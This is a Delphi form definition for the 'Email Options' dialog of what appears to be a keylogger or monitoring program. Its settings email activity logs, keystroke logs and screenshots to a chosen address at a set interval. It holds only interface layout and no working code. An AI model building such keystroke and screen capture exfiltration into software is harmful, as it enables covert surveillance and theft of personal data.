home *** CD-ROM | disk | FTP | other *** search
- object Form14: TForm14
- Left = 362
- Top = 301
- BorderIcons = []
- BorderStyle = bsSingle
- Caption = 'Email Options'
- ClientHeight = 212
- ClientWidth = 299
- Color = clWhite
- Font.Charset = DEFAULT_CHARSET
- Font.Color = clWindowText
- Font.Height = -11
- Font.Name = 'MS Sans Serif'
- Font.Style = []
- Position = poScreenCenter
- OnShow = FormShow
- PixelsPerInch = 96
- TextHeight = 13
- object Label1: TLabel
- Left = 80
- Top = 15
- Width = 189
- Height = 13
- Caption = 'Interval for sending out logs (in minutes).'
- Font.Charset = DEFAULT_CHARSET
- Font.Color = clNavy
- Font.Height = -11
- Font.Name = 'MS Sans Serif'
- Font.Style = []
- ParentFont = False
- end
- object Label2: TLabel
- Left = 139
- Top = 45
- Width = 111
- Height = 13
- Caption = 'DNS Server IP Address'
- Font.Charset = DEFAULT_CHARSET
- Font.Color = clNavy
- Font.Height = -11
- Font.Name = 'MS Sans Serif'
- Font.Style = []
- ParentFont = False
- end
- object Label3: TLabel
- Left = 141
- Top = 74
- Width = 66
- Height = 13
- Caption = 'Email Address'
- Font.Charset = DEFAULT_CHARSET
- Font.Color = clNavy
- Font.Height = -11
- Font.Name = 'MS Sans Serif'
- Font.Style = []
- ParentFont = False
- end
- object SpinEdit1: TSpinEdit
- Left = 8
- Top = 11
- Width = 65
- Height = 22
- EditorEnabled = False
- Increment = 10
- MaxValue = 2000
- MinValue = 10
- TabOrder = 0
- Value = 60
- end
- object BitBtn1: TBitBtn
- Left = 115
- Top = 176
- Width = 75
- Height = 27
- Caption = 'OK'
- TabOrder = 1
- OnClick = BitBtn1Click
- end
- object Edit1: TEdit
- Left = 8
- Top = 41
- Width = 121
- Height = 21
- TabOrder = 2
- Text = '198.41.0.6'
- end
- object Edit2: TEdit
- Left = 8
- Top = 70
- Width = 121
- Height = 21
- TabOrder = 3
- end
- object CheckBox1: TCheckBox
- Left = 9
- Top = 102
- Width = 216
- Height = 17
- Caption = 'Send Most Recent Activity Log'
- Font.Charset = DEFAULT_CHARSET
- Font.Color = clNavy
- Font.Height = -11
- Font.Name = 'MS Sans Serif'
- Font.Style = []
- ParentFont = False
- State = cbChecked
- TabOrder = 4
- end
- object CheckBox2: TCheckBox
- Left = 9
- Top = 125
- Width = 240
- Height = 17
- Caption = 'Send Most Recent Keystroke Log'
- Font.Charset = DEFAULT_CHARSET
- Font.Color = clNavy
- Font.Height = -11
- Font.Name = 'MS Sans Serif'
- Font.Style = []
- ParentFont = False
- State = cbChecked
- TabOrder = 5
- end
- object CheckBox3: TCheckBox
- Left = 9
- Top = 148
- Width = 224
- Height = 17
- Caption = 'Send Most Recent Captured Screenshot'
- Font.Charset = DEFAULT_CHARSET
- Font.Color = clNavy
- Font.Height = -11
- Font.Name = 'MS Sans Serif'
- Font.Style = []
- ParentFont = False
- State = cbChecked
- TabOrder = 6
- end
- end
-